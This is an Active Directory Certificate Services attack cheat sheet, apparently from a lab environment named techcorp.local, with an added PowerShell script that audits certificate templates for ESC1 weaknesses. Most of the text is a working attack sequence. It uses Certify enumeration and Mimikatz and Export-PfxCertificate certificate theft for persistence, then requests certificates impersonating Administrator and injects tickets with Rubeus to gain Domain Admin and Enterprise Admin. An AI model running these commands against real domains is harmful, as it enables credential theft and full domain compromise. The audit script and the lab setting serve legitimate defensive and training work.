ADCS
Conditions that make a certificate template vulnerable to abuse (ESC1)
The CA grants enrollment rights to normal/low-privileged users
Manager approval is disabled
Authorized signatures are not required
The target template grants enrollment rights to normal/low-privileged users (and lets the enrollee supply the subject)
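An added audit script (not from the original page) that checks the conditions above from the defender's side, so affected templates can be fixed before they are found by tooling. It assumes a domain-joined host, uses ADSI only (no RSAT module), and treats Everyone, Authenticated Users, Domain Users and Domain Computers as the low-privileged principals; the SIDs, flag bits and EKU OIDs are the documented AD CS values.

```powershell
# Added audit script, not part of the original page. Flags templates that meet the ESC1
# preconditions listed above so they can be remediated. Uses ADSI only (no RSAT needed) and
# assumes a domain-joined host; the Configuration partition is readable by any domain user.
$EnrollGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$AuthEkus   = '1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2', '1.3.6.1.5.2.3.4', '2.5.29.37.0'  # ClientAuth, SmartCard, PKINIT, AnyPurpose
# SIDs treated as "low privileged" for the enrollment-rights check (assumed set, adjust as needed)
$LowPriv = foreach ($n in 'Everyone', 'Authenticated Users', 'Domain Users', 'Domain Computers') {
    try { ([System.Security.Principal.NTAccount]$n).Translate([System.Security.Principal.SecurityIdentifier]).Value } catch {}
}

function Get-Esc1Templates {
    $confNc   = ([ADSI]'LDAP://RootDSE').configurationNamingContext
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$confNc"
    $searcher.Filter     = '(objectClass=pKICertificateTemplate)'
    foreach ($r in $searcher.FindAll()) {
        $p = $r.Properties
        $nameFlag   = [int]$p['mspki-certificate-name-flag'][0]
        $enrollFlag = [int]$p['mspki-enrollment-flag'][0]
        $raSigs     = if ($p['mspki-ra-signature'].Count) { [int]$p['mspki-ra-signature'][0] } else { 0 }
        $ekus       = @($p['pkiextendedkeyusage'])
        # Template-level conditions: requester supplies the subject (SAN), no manager approval,
        # no authorized signatures, and an EKU usable for logon (no EKU at all means any purpose).
        $suppliesSubject = ($nameFlag -band 0x1) -ne 0      # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
        $needsApproval   = ($enrollFlag -band 0x2) -ne 0    # CT_FLAG_PEND_ALL_REQUESTS
        $authEku         = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $AuthEkus -contains $_ })
        if (-not $suppliesSubject -or $needsApproval -or $raSigs -gt 0 -or -not $authEku) { continue }
        # Enrollment rights: Allow ACEs carrying the Enroll extended right (or all extended rights).
        $acl = ([ADSI]"LDAP://$($p['distinguishedname'][0])").ObjectSecurity
        $enrollers = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                (($_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -ne 0) -and
                ($_.ObjectType -eq $EnrollGuid -or $_.ObjectType -eq [guid]::Empty)
            } | ForEach-Object { $_.IdentityReference.Value }
        $lowPrivEnrollers = @($enrollers | Where-Object { $LowPriv -contains $_ })
        if ($lowPrivEnrollers.Count -gt 0) {
            [pscustomobject]@{ Template = $p['cn'][0]; LowPrivEnrollers = ($lowPrivEnrollers -join ', ') }
        }
    }
}

# Each row is a template to remediate: clear the enrollee-supplies-subject flag, require manager
# approval, or restrict enrollment rights; then re-check with Certify.exe find /vulnerable.
Get-Esc1Templates | Format-Table -AutoSize
```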
Enumerating Active Directory Certificate Services (ADCS)
Identify the ADCS service installation
Certify.exe cas
Enumerate the templates configured
Certify.exe find
Enumerate the vulnerable templates
Certify.exe find /vulnerable
If enrolleeSuppliesSubject is not allowed for all domain users, the template will not show up as vulnerable and needs to be enumerated separately (ESC1)
Certify.exe find /enrolleeSuppliesSubject
Persistence (THEFT-4): Extracting User and Machine certificates
List all certificates in the local machine certificate store
ls cert:\LocalMachine\My
Export the certificate in PFX format
ls cert:\LocalMachine\My\89C1171F6810A6725A47DB8D572537D736D4FF17 | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'niks' -Force -AsPlainText)
Use Mimikatz to export certificates in PFX format (the default export password is mimikatz)
Invoke-mimikatz -Command "crypto::certificates /export"
Invoke-mimikatz -Command "!crypto::certificates /systemstore:local_machine /export"
Base64-encode the exported PFX so it can be passed to Rubeus
cat cert.pfx | base64 -w 0
Request a TGT with the exported certificate and inject it into memory
C:\AD\Tools\Rubeus.exe asktgt /user:nlamb /certificate:MNeg[...]IH0A== /password:mimikatz /nowrap /ptt
Escalation (ESC1): Domain User to Domain Admin and Enterprise Admin
CASE I: Domain Admin
Request a certificate for the DA user using the ESC1 technique and save it as cert.pem
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
Convert cert.pem to cert.pfx format
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx
Request a TGT using the PFX certificate and inject it into memory
Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:niks /nowrap /ptt
CASE II: Enterprise Admin
Request a certificate for the EA user using the ESC1 technique and save it as cert.pem
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
Convert cert.pem to cert.pfx format
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx
Request a TGT using the PFX certificate and inject it into memory
Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:niks /nowrap /ptt